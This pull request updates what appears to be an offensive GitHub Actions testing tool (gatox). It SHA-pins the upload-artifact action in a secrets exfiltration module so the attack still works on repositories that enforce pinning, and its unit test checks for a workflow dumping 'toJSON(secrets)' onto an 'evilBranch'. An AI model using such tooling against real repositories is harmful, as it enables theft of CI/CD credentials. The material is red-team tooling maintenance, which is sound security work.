### PR TITLE
update(attack): Use SHA-pinned upload artifact.

### DIFF
--- a/gatox/attack/secrets/secrets_attack.py
+++ b/gatox/attack/secrets/secrets_attack.py
@@ -115,7 +115,7 @@ EOF
                 # This avoids the edge case where there is a secret set to a value that is in the Base64 (which breaks everything).
                 {
                     "name": "Upload artifacts",
-                    "uses": "actions/upload-artifact@v4",
+                    "uses": "actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a",
                     "with": {
                         "name": artifact_name,
                         "path": " |\noutput_updated.json\nlookup.txt",

--- a/unit_test/test_secrets_attack.py
+++ b/unit_test/test_secrets_attack.py
@@ -26,7 +26,7 @@ def test_create_secret_exil_yaml():
     yaml = attacker.create_exfil_yaml(pub, "evilBranch")
 
     assert "${{ toJSON(secrets)}}" in yaml
-    assert "actions/upload-artifact@v4" in yaml
+    assert "actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a" in yaml
     assert "name: files\n" in yaml
     assert "matrix" not in yaml
 


### PR DESCRIPTION
## Summary

Secrets attack fails if repos require SHA-pinning, so pin upload artifact to SHA.

## Type of change
- [x] Bug fix
- [ ] New feature
- [ ] Breaking change
- [ ] Other

## Testing

<!-- How did you verify this works? -->

## Notes

<!-- Anything reviewers should know (security implications, breaking changes, etc.) -->

Closes #
